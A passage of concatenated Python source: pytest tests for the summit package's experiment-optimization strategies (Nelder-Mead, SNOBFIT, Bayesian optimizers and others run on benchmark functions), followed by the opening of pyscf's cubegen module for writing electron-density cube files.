return [column[0] for column in self.columns if column[1] == "METADATA"]
@property
def data_columns(self):
"""Names of the data columns"""
return [column[0] for column in self.columns if column[1] == "DATA"]
def insert(
self, loc, column, value, type="DATA", units=None, allow_duplicates=False
):
super().insert(loc, (column, type), value, allow_duplicates)
```
#### File: summit/tests/test_strategies.py
```python
import pytest
from summit.benchmarks import *
from summit.domain import *
from summit.utils.dataset import DataSet
from summit.utils.multiobjective import pareto_efficient, hypervolume
from summit.strategies import *
import GPy
from fastprogress.fastprogress import progress_bar
import numpy as np
import os
import warnings
import pkg_resources
def test_strategy():
class MockStrategy(Strategy):
def suggest_experiments(self, num_experiments, previous_results):
inputs, outputs = self.transform.transform_inputs_outputs(previous_results)
objectives = [v for v in self.domain.variables if v.is_objective]
assert len(objectives) == 1
assert objectives[0].name == "scalar_objective"
assert outputs["scalar_objective"].iloc[0] == 70.0
return self.transform.un_transform(inputs)
def reset(self):
pass
def test_random():
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
strategy = Random(domain, random_state=np.random.RandomState(3))
results = strategy.suggest_experiments(5)
arr = np.array(
(
[
[77.53989513, 0.45851724, 0.11195048],
[85.40739113, 0.15023412, 0.28273329],
[64.54523695, 0.18289715, 0.35965762],
[75.54138026, 0.12058688, 0.21139491],
[94.64734772, 0.27632394, 0.37050196],
]
)
)
results_arr = results.data_to_numpy().astype(np.float32)
assert np.isclose(results_arr.all(), arr.all())
solvent_ds = DataSet(
[[5, 81], [-93, 111]],
index=["benzene", "toluene"],
columns=["melting_point", "boiling_point"],
)
domain += CategoricalVariable(
"solvent", "solvent descriptors", descriptors=solvent_ds
)
strategy = Random(domain, random_state=np.random.RandomState(3))
results = strategy.suggest_experiments(5)
return results
def test_lhs():
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
strategy = LHS(domain, random_state=np.random.RandomState(3))
results = strategy.suggest_experiments(5)
arr = np.array(
[
[95.0, 0.46, 0.38],
[65.0, 0.14, 0.14],
[55.0, 0.22, 0.3],
[85.0, 0.3, 0.46],
[75.0, 0.38, 0.22],
]
)
results_arr = results.data_to_numpy().astype(np.float32)
assert np.isclose(results_arr.all(), arr.all())
solvent_ds = DataSet(
[[5, 81], [-93, 111]],
index=["benzene", "toluene"],
columns=["melting_point", "boiling_point"],
)
domain += CategoricalVariable(
"solvent", "solvent descriptors", descriptors=solvent_ds
)
strategy = LHS(domain, random_state=np.random.RandomState(3))
results = strategy.suggest_experiments(5)
return results
def test_doe():
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="yield_", description="", bounds=[0, 100], is_objective=True, maximize=True
)
domain += ContinuousVariable(
name="de",
description="diastereomeric excess",
bounds=[0, 100],
is_objective=True,
maximize=True,
)
strategy = FullFactorial(domain)
levels = dict(temperature=[50, 100], flowrate_a=[0.1, 0.5], flowrate_b=[0.1, 0.5])
experiments = strategy.suggest_experiments(levels)
return experiments
def test_multitosingleobjective_transform():
class MockStrategy(Strategy):
def suggest_experiments(self, num_experiments, previous_results):
inputs, outputs = self.transform.transform_inputs_outputs(previous_results)
objectives = [v for v in self.domain.variables if v.is_objective]
assert len(objectives) == 1
assert objectives[0].name == "scalar_objective"
assert outputs["scalar_objective"].iloc[0] == 70.0
return self.transform.un_transform(inputs)
def reset(self):
pass
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="yield_", description="", bounds=[0, 100], is_objective=True, maximize=True
)
domain += ContinuousVariable(
name="de",
description="diastereomeric excess",
bounds=[0, 100],
is_objective=True,
maximize=True,
)
columns = [v.name for v in domain.variables]
values = {
("temperature", "DATA"): 60,
("flowrate_a", "DATA"): 0.5,
("flowrate_b", "DATA"): 0.5,
("yield_", "DATA"): 50,
("de", "DATA"): 90,
}
previous_results = DataSet([values], columns=columns)
transform = MultitoSingleObjective(
domain, expression="(yield_+de)/2", maximize=True
)
strategy = MockStrategy(domain, transform=transform)
strategy.suggest_experiments(5, previous_results)
def test_logspaceobjectives_transform():
class MockStrategy(Strategy):
def suggest_experiments(self, num_experiments, previous_results):
inputs, outputs = self.transform.transform_inputs_outputs(previous_results)
objectives = [v for v in self.domain.variables if v.is_objective]
assert len(objectives) == 2
assert np.isclose(outputs["log_yield_"].iloc[0], np.log(50))
assert np.isclose(outputs["log_de"].iloc[0], np.log(90))
return self.transform.un_transform(inputs)
def reset(self):
pass
domain = Domain()
domain += ContinuousVariable(
name="temperature",
description="reaction temperature in celsius",
bounds=[50, 100],
)
domain += ContinuousVariable(
name="flowrate_a", description="flow of reactant a in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="flowrate_b", description="flow of reactant b in mL/min", bounds=[0.1, 0.5]
)
domain += ContinuousVariable(
name="yield_", description="", bounds=[0, 100], is_objective=True, maximize=True
)
domain += ContinuousVariable(
name="de",
description="diastereomeric excess",
bounds=[0, 100],
is_objective=True,
maximize=True,
)
columns = [v.name for v in domain.variables]
values = {
("temperature", "DATA"): [60, 100],
("flowrate_a", "DATA"): [0.5, 0.4],
("flowrate_b", "DATA"): [0.5, 0.4],
("yield_", "DATA"): [50, 60],
("de", "DATA"): [90, 80],
}
previous_results = DataSet(values, columns=columns)
transform = LogSpaceObjectives(domain)
strategy = MockStrategy(domain, transform=transform)
strategy.suggest_experiments(5, previous_results)
@pytest.mark.parametrize("num_experiments", [1, 2, 4])
@pytest.mark.parametrize("maximize", [True, False])
@pytest.mark.parametrize("constraints", [False])
def test_snobfit(num_experiments, maximize, constraints):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraints)
strategy = SNOBFIT(hartmann3D.domain, probability_p=0.5, dx_dim=1e-5)
initial_exp = None
# Comment out to start without initial data
# initial_exp = pd.DataFrame(data={'x_1': [0.409,0.112,0.17,0.8], 'x_2': [0.424,0.33,0.252,0.1],
# 'x_3': [0.13,0.3,0.255,0.01]}) # initial experimental points
# initial_exp = DataSet.from_df(initial_exp)
# initial_exp = hartmann3D.run_experiments(initial_exp) # initial results
# run SNOBFIT loop for fixed <num_iter> number of iteration with <num_experiments> number of experiments each
# stop loop if <max_stop> consecutive iterations have not produced an improvement
num_iter = 400 // num_experiments
max_stop = 50 // num_experiments
nstop = 0
fbestold = float("inf")
# Initial experiments
if initial_exp is not None:
next_experiments = initial_exp
else:
next_experiments = None
param = None
for i in range(num_iter):
# Call of SNOBFIT
next_experiments = strategy.suggest_experiments(
num_experiments, prev_res=next_experiments
)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
fbestold = fbest
nstop = 0
else:
nstop += 1
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
xbest = np.around(xbest, decimals=3)
fbest = np.around(fbest, decimals=3)
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
assert fbest <= -3.85 and fbest >= -3.87
# Test saving and loading
strategy.save("snobfit_test.json")
strategy_2 = SNOBFIT.load("snobfit_test.json")
for a, b in zip(strategy.prev_param[0], strategy_2.prev_param[0]):
if type(a) == list:
assert all(a) == all(b)
elif type(a) == np.ndarray:
assert a.all() == b.all()
elif np.isnan(a):
assert np.isnan(b)
else:
assert a == b
assert all(strategy.prev_param[1][0]) == all(strategy_2.prev_param[1][0])
os.remove("snobfit_test.json")
print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
@pytest.mark.parametrize("x_start", [[], [0, 0], [4, 6], [1, 2], [-2, 5]])
@pytest.mark.parametrize("maximize", [True, False])
@pytest.mark.parametrize("constraint", [True, False])
def test_nm2D(x_start, maximize, constraint, plot=False):
himmelblau = Himmelblau(maximize=maximize, constraints=constraint)
strategy = NelderMead(
himmelblau.domain, x_start=x_start, random_start=True, adaptive=False
) # Will only random start if x_start is []
initial_exp = None
# Uncomment to create test case which results in reduction dimension and dimension recovery
# initial_exp = pd.DataFrame(data={'x_1': [4.0,4.0,2.0], 'x_2': [2.0,3.0,-6.0]})
# initial_exp = DataSet.from_df(initial_exp)
# initial_exp = himmelblau.run_experiments(initial_exp) # initial results
# run Nelder-Mead loop for fixed <num_iter> number of iteration
num_iter = 100 # maximum number of iterations
max_stop = 20 # allowed number of consecutive iterations w/o improvement
nstop = 0
fbestold = float("inf")
polygons_points = []
# Initial experiments
if initial_exp is not None:
polygons_points.append(
np.asarray(
[
(
initial_exp.data_to_numpy()[i][:2].tolist(),
initial_exp.data_to_numpy()[j][:2],
)
for i in range(len(initial_exp.data_to_numpy()))
for j in range(len(initial_exp.data_to_numpy()))
]
)
)
next_experiments = initial_exp
else:
next_experiments = None
param = None
for i in range(num_iter):
next_experiments = strategy.suggest_experiments(prev_res=next_experiments)
# This is the part where experiments take place
next_experiments = himmelblau.run_experiments(next_experiments)
# save polygon points for plotting
param = strategy.prev_param
polygons_points.append(
np.asarray(
[param[0]["sim"][i].tolist() for i in range(len(param[0]["sim"]))]
)
)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
fbestold = fbest
nstop = 0
else:
nstop += 1
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
xbest = np.around(xbest, decimals=3)
fbest = np.around(fbest, decimals=3)
assert fbest <= 0.1
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraints: four identical local minima f = 0 at x1 = (3.000, 2.000),
# x2 = (-2.810, 3.131), x3 = (-3.779, -3.283), x4 = (3.584, -1.848)
# Test saving and loading
strategy.save("nm_2d.json")
strategy_2 = NelderMead.load("nm_2d.json")
assert strategy._x_start == strategy_2._x_start
assert strategy.random_start == strategy_2.random_start
assert strategy._dx == strategy_2._dx
assert strategy._df == strategy_2._df
assert strategy._adaptive == strategy_2._adaptive
p = strategy.prev_param[0]
p2 = strategy.prev_param[0]
for k, v in p.items():
if type(v) not in [list, np.ndarray]:
assert v == p2[k]
elif type(v) == list:
for i, l in enumerate(v):
if type(l) in [np.ndarray, DataSet]:
assert l.all() == p2[k][i].all()
else:
assert l == p2[k][i]
assert all(strategy.prev_param[1]) == all(strategy_2.prev_param[1])
os.remove("nm_2d.json")
# plot
if plot:
fig, ax = himmelblau.plot(polygons=polygons_points)
@pytest.mark.parametrize(
"x_start, maximize, constraint",
[
([0, 0, 0], True, True),
([0, 0, 0], True, False),
([0, 0, 0], False, True),
([0, 0, 0], False, False),
([1, 1, 0.2], True, False),
([1, 1, 0.2], False, False),
([], True, True),
([], True, False),
([], False, True),
([], False, False),
([0.4, 0.2, 0.6], True, True),
([0.4, 0.2, 0.6], True, False),
([0.4, 0.2, 0.6], False, True),
([0.4, 0.2, 0.6], False, False),
],
)
def test_nm3D(maximize, x_start, constraint, plot=False):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
strategy = NelderMead(hartmann3D.domain, x_start=x_start)
strategy.save("nm_3d.json")
strategy_2 = NelderMead.load("nm_3d.json")
initial_exp = None
# Uncomment to create test case which results in reduction dimension and dimension recovery
# initial_exp = pd.DataFrame(data={'x_1': [0.1,0.1,0.4,0.3], 'x_2': [0.6,0.2,0.4,0.5], 'x_3': [1,1,1,0.3]})
# initial_exp = DataSet.from_df(initial_exp)
# initial_exp = hartmann3D.run_experiments(initial_exp)
# run Nelder-Mead loop for fixed <num_iter> number of iteration
num_iter = 200 # maximum number of iterations
max_stop = 20 # allowed number of consecutive iterations w/o improvement
nstop = 0
fbestold = float("inf")
polygons_points = []
# Initial experiments
if initial_exp is not None:
polygons_points.append(
np.asarray(
[
(
initial_exp.data_to_numpy()[i][:3].tolist(),
initial_exp.data_to_numpy()[j][:3],
)
for i in range(len(initial_exp.data_to_numpy()))
for j in range(len(initial_exp.data_to_numpy()))
]
)
)
next_experiments = initial_exp
else:
next_experiments = None
param = None
for i in range(num_iter):
next_experiments = strategy.suggest_experiments(prev_res=next_experiments)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
# save polygon points for plotting
param = strategy.prev_param
polygons_points.append(
np.asarray(
[param[0]["sim"][i].tolist() for i in range(len(param[0]["sim"]))]
)
)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
fbestold = fbest
nstop = 0
else:
nstop += 1
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
xbest = np.around(xbest, decimals=3)
fbest = np.around(fbest, decimals=3)
print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# assert (xbest[0] >= 0.113 and xbest[0] <= 0.115) and (xbest[1] >= 0.555 and xbest[1] <= 0.557) and \
# (xbest[2] >= 0.851 and xbest[2] <= 0.853) and (fbest <= -3.85 and fbest >= -3.87)
# Test saving and loading
strategy.save("nm_3d.json")
strategy_2 = NelderMead.load("nm_3d.json")
assert strategy._x_start == strategy_2._x_start
assert strategy._dx == strategy_2._dx
assert strategy._df == strategy_2._df
assert strategy._adaptive == strategy_2._adaptive
p = strategy.prev_param[0]
p2 = strategy.prev_param[0]
for k, v in p.items():
if type(v) not in [list, np.ndarray]:
assert v == p2[k]
elif type(v) == list:
for i, l in enumerate(v):
if type(l) in [np.ndarray, DataSet]:
assert l.all() == p2[k][i].all()
else:
assert l == p2[k][i]
assert all(strategy.prev_param[1]) == all(strategy_2.prev_param[1])
os.remove("nm_3d.json")
if plot:
fig, ax = hartmann3D.plot(polygons=polygons_points)
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint",
[
[1, 1, True, True],
[1, 200, True, True],
[4, 200, False, True],
[1, 200, True, False],
[4, 200, False, False],
],
)
def test_sobo(
batch_size, max_num_exp, maximize, constraint, test_num_improve_iter=2, plot=False
):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
strategy = SOBO(domain=hartmann3D.domain, kernel=GPy.kern.Matern32(3))
# run SOBO loop for fixed <num_iter> number of iteration
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
80 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = (
20 // batch_size
) # minimum number of iterations before algorithm is stopped
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(
num_experiments=batch_size, prev_res=next_experiments
)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest} at point: {xbest}"
print("\n")
else:
nstop += 1
if nstop >= max_stop:
print(
"Stopping criterion reached. No improvement in last "
+ str(max_stop)
+ " iterations."
)
break
if fbest < -3.85:
print("Stopping criterion reached. Function value below -3.85.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# if check_convergence:
# assert (fbest <= -3.85 and fbest >= -3.87)
# Test saving and loading
strategy.save("sobo_test.json")
strategy_2 = SOBO.load("sobo_test.json")
os.remove("sobo_test.json")
if strategy.prev_param is not None:
assert strategy.prev_param[0].all() == strategy_2.prev_param[0].all()
assert strategy.prev_param[1].all() == strategy_2.prev_param[1].all()
assert strategy.use_descriptors == strategy_2.use_descriptors
assert strategy.gp_model_type == strategy_2.gp_model_type
assert strategy.acquisition_type == strategy_2.acquisition_type
assert strategy.optimizer_type == strategy_2.optimizer_type
assert strategy.evaluator_type == strategy_2.evaluator_type
assert strategy.kernel.to_dict() == strategy_2.kernel.to_dict()
assert strategy.exact_feval == strategy_2.exact_feval
assert strategy.ARD == strategy_2.ARD
assert strategy.standardize_outputs == strategy_2.standardize_outputs
if plot:
fig, ax = hartmann3D.plot()
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint",
[
[1, 1, True, True],
[1, 200, True, True],
[4, 200, False, True],
[1, 200, True, False],
[4, 200, False, False],
],
)
def test_mtbo(
batch_size,
max_num_exp,
maximize,
constraint,
test_num_improve_iter=2,
plot=False,
n_pretraining=100,
):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
# Pretraining data
random = Random(hartmann3D.domain)
conditions = random.suggest_experiments(n_pretraining)
results = hartmann3D.run_experiments(conditions)
results["task", "METADATA"] = 0
strategy = MTBO(domain=hartmann3D.domain, pretraining_data=results)
# run SOBO loop for fixed <num_iter> number of iteration
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
80 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = (
20 // batch_size
) # minimum number of iterations before algorithm is stopped
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(
num_experiments=batch_size, prev_res=next_experiments
)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest}"
print("\n")
else:
nstop += 1
if nstop >= max_stop:
print(
"Stopping criterion reached. No improvement in last "
+ str(max_stop)
+ " iterations."
)
break
if fbest < -3.85:
print("Stopping criterion reached. Function value below -3.85.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# if check_convergence:
# assert (fbest <= -3.85 and fbest >= -3.87)
# Test saving and loading
# strategy.save("sobo_test.json")
# strategy_2 = SOBO.load("sobo_test.json")
# os.remove("sobo_test.json")
if plot:
fig, ax = hartmann3D.plot()
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint, test_id",
[[1, 1, True, False, 0], [1, 200, True, False, 1], [4, 200, False, False, 2]],
)
def test_gryffin_himmelblau(
batch_size,
max_num_exp,
maximize,
constraint,
test_id,
test_num_improve_iter=2,
plot=False,
):
himmelblau = Himmelblau(maximize=maximize, constraints=constraint)
strategy = GRYFFIN(domain=himmelblau.domain, sampling_strategies=batch_size)
# run Gryffin loop for fixed <num_iter> number of iteration
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
60 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = 20 // batch_size
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(prev_res=next_experiments)
# This is the part where experiments take place
next_experiments = himmelblau.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest} at point: {xbest}"
print("\n")
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
if fbest < 2:
print("Stopping criterion reached. Function value below 0.5.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraints: four identical local minima f = 0 at x1 = (3.000, 2.000),
# x2 = (-2.810, 3.131), x3 = (-3.779, -3.283), x4 = (3.584, -1.848)
# assert (fbest <= 2)
# Test saving and loading
save_name = "gryffin_test_himmelblau_" + str(test_id) + ".json"
strategy.save(save_name)
strategy_2 = GRYFFIN.load(save_name)
os.remove(save_name)
if strategy.prev_param is not None:
assert strategy.config_dict == strategy_2.config_dict
assert strategy.prev_param == strategy_2.prev_param
assert strategy.use_descriptors == strategy_2.use_descriptors
if plot:
fig, ax = himmelblau.plot()
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint, test_id",
[[1, 1, True, False, 0], [1, 200, True, False, 1], [4, 200, False, False, 2]],
)
def test_gryffin_hartmann(
batch_size,
max_num_exp,
maximize,
constraint,
test_id,
test_num_improve_iter=2,
plot=False,
):
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
strategy = GRYFFIN(domain=hartmann3D.domain, sampling_strategies=batch_size)
# run GRYFFIN loop for fixed <num_iter> number of iteration
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
60 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = 20 // batch_size
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(prev_res=next_experiments)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest} at point: {xbest}"
print("\n")
if nstop >= max_stop:
print("No improvement in last " + str(max_stop) + " iterations.")
break
if fbest < -3.5:
print("Stopping criterion reached. Function value below -3.85.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
pb.comment = f"Best f value: {fbest}"
print("\n")
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# assert (fbest <= -3.5 and fbest >= -3.87)
# Test saving and loading
save_name = "gryffin_test_hartmann3D_" + str(test_id) + ".json"
strategy.save(save_name)
strategy_2 = GRYFFIN.load(save_name)
os.remove(save_name)
if strategy.prev_param is not None:
assert strategy.config_dict == strategy_2.config_dict
assert strategy.prev_param == strategy_2.prev_param
assert strategy.use_descriptors == strategy_2.use_descriptors
if plot:
fig, ax = hartmann3D.plot()
def test_tsemo(test_num_improve_iter=2, save=False):
num_inputs = 2
num_objectives = 2
lab = VLMOP2()
strategy = TSEMO(lab.domain)
experiments = strategy.suggest_experiments(5 * num_inputs)
warnings.filterwarnings("ignore", category=RuntimeWarning)
warnings.filterwarnings("ignore", category=DeprecationWarning)
num_improve_iter = 0
best_hv = None
pb = progress_bar(range(20))
for i in pb:
# Run experiments
experiments = lab.run_experiments(experiments)
# Get suggestions
experiments = strategy.suggest_experiments(1, experiments)
if save:
strategy.save("tsemo_settings.json")
y_pareto, _ = pareto_efficient(
lab.data[["y_0", "y_1"]].to_numpy(), maximize=False
)
hv = hypervolume(y_pareto, [11, 11])
if best_hv == None:
best_hv = hv
elif hv > best_hv:
best_hv = hv
num_improve_iter += 1
pb.comment = f"Hypervolume: {hv}"
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# assert hv > 117.0
@pytest.mark.parametrize(
"batch_size, max_num_exp, maximize, constraint",
[[1, 1, True, False], [1, 200, True, False], [4, 200, False, False]],
)
def test_entmoot(
batch_size, max_num_exp, maximize, constraint, test_num_improve_iter=2, plot=False
):
# Only run if gurobipy installed
required = {"gurobipy"}
installed = {pkg.key for pkg in pkg_resources.working_set}
missing = required - installed
if missing:
return
hartmann3D = Hartmann3D(maximize=maximize, constraints=constraint)
strategy = ENTMOOT(domain=hartmann3D.domain)
# run SOBO loop for fixed <num_iter> number of iteration
num_iter = max_num_exp // batch_size # maximum number of iterations
max_stop = (
80 // batch_size
) # allowed number of consecutive iterations w/o improvement
min_stop = (
20 // batch_size
) # minimum number of iterations before algorithm is stopped
nstop = 0
num_improve_iter = 0
fbestold = float("inf")
next_experiments = None
pb = progress_bar(range(num_iter))
for i in pb:
next_experiments = strategy.suggest_experiments(
num_experiments=batch_size, prev_res=next_experiments
)
# This is the part where experiments take place
next_experiments = hartmann3D.run_experiments(next_experiments)
fbest = strategy.fbest * -1.0 if maximize else strategy.fbest
xbest = strategy.xbest
if fbest < fbestold:
if fbest < 0.99 * fbestold or i < min_stop:
nstop = 0
num_improve_iter += 1
else:
nstop += 1
fbestold = fbest
pb.comment = f"Best f value: {fbest} at point: {xbest}"
print("\n")
else:
nstop += 1
if nstop >= max_stop:
print(
"Stopping criterion reached. No improvement in last "
+ str(max_stop)
+ " iterations."
)
break
if fbest < -3.85:
print("Stopping criterion reached. Function value below -3.85.")
break
if num_improve_iter >= test_num_improve_iter:
print(
"Requirement to improve fbest in at least {} satisfied, test stopped.".format(
test_num_improve_iter
)
)
break
# xbest = np.around(xbest, decimals=3)
# fbest = np.around(fbest, decimals=3)
# print("Optimal setting: " + str(xbest) + " with outcome: " + str(fbest))
# Extrema of test function without constraint: glob_min = -3.86 at (0.114,0.556,0.853)
# if check_convergence:
# assert (fbest <= -3.85 and fbest >= -3.87)
# Test saving and loading
strategy.save("entmoot_test.json")
strategy_2 = ENTMOOT.load("entmoot_test.json")
os.remove("entmoot_test.json")
if strategy.prev_param is not None:
assert strategy.prev_param[0].all() == strategy_2.prev_param[0].all()
assert strategy.prev_param[1].all() == strategy_2.prev_param[1].all()
assert strategy.use_descriptors == strategy_2.use_descriptors
assert strategy.estimator_type == strategy_2.estimator_type
assert strategy.std_estimator_type == strategy_2.std_estimator_type
assert strategy.acquisition_type == strategy_2.acquisition_type
assert strategy.optimizer_type == strategy_2.optimizer_type
assert strategy.generator_type == strategy_2.generator_type
assert strategy.initial_points == strategy_2.initial_points
assert strategy.min_child_samples == strategy_2.min_child_samples
if plot:
fig, ax = hartmann3D.plot()
```
|
{
"source": "JezsMartinez/pyscf",
"score": 2
}
|
#### File: pyscf/tools/cubegen.py
```python
import time
import numpy
import pyscf
from pyscf import lib
from pyscf import gto
from pyscf import df
from pyscf.dft import numint
from pyscf import __config__
RESOLUTION = getattr(__config__, 'cubegen_resolution', None)
BOX_MARGIN = getattr(__config__, 'cubegen_box_margin', 3.0)
ORIGIN = getattr(__config__, 'cubegen_box_origin', None)
# If given, EXTENT should be a 3-element ndarray/list/tuple to represent the
# extension in x, y, z
EXTENT = getattr(__config__, 'cubegen_box_extent', None)
def density(mol, outfile, dm, nx=80, ny=80, nz=80, resolution=RESOLUTION,
margin=BOX_MARGIN):
"""Calculates electron density and write out in cube format.
Args:
mol : Mole
Molecule to calculate the electron density for.
outfile : str
Name of Cube file to be written.
dm : ndarray
Density matrix of molecule.
Kwargs:
nx : int
Number of grid point divisions in x direction.
Note this is function of the molecule's size; a larger molecule
will have a coarser representation than a smaller one for the
same value. Conflicts to keyword resolution.
ny : int
Number of grid point divisions in y direction.
nz : int
Number of grid point divisions in z direction.
resolution: float
Resolution of the mesh grid in the cube box. If resolution is
given in the input, the input nx/ny/nz have no effects. The value
of nx/ny/nz will be determined by the resolution and the cube box
size.
"""
from pyscf.pbc.gto import Cell
cc = Cube(mol, nx, ny, nz, resolution, margin)
GTOval = 'GTOval'
if isinstance(mol, Cell):
GTOval = 'PBC' + GTOval
# Compute density on the .cube grid
coords = cc.get_coords()
ngrids = cc.get_ngrids()
blksize = min(8000, ngrids)
rho = numpy.empty(ngrids)
for ip0, ip1 in lib.prange(0, ngrids, blksize):
ao = mol.eval_gto(GTOval, coords[ip0:ip1])
rho[ip0:ip1] = numint.eval_rho(mol, ao, dm)
rho = rho.reshape(cc.nx,cc.ny,cc.nz)
# Write out density to the .cube file
cc.write(rho, outfile, comment='Electron density in real space (e/Bohr^3)')
return rho
def orbital(mol, outfile, coeff, nx=80, ny=80, nz=80, resolution=RESOLUTION,
margin=BOX_MARGIN):
"""Calculate orbital value on real space grid and write out in cube format.
Args:
mol : Mole
Molecule to calculate the electron density for.
outfile : str
Name of Cube file to be written.
coeff : 1D array
coeff coefficient.
Kwargs:
nx : int
Number of grid point divisions in x direction.
Note this is function of the molecule's size; a larger molecule
will have a coarser representation than a smaller one for the
same value. Conflicts to keyword resolution.
ny : int
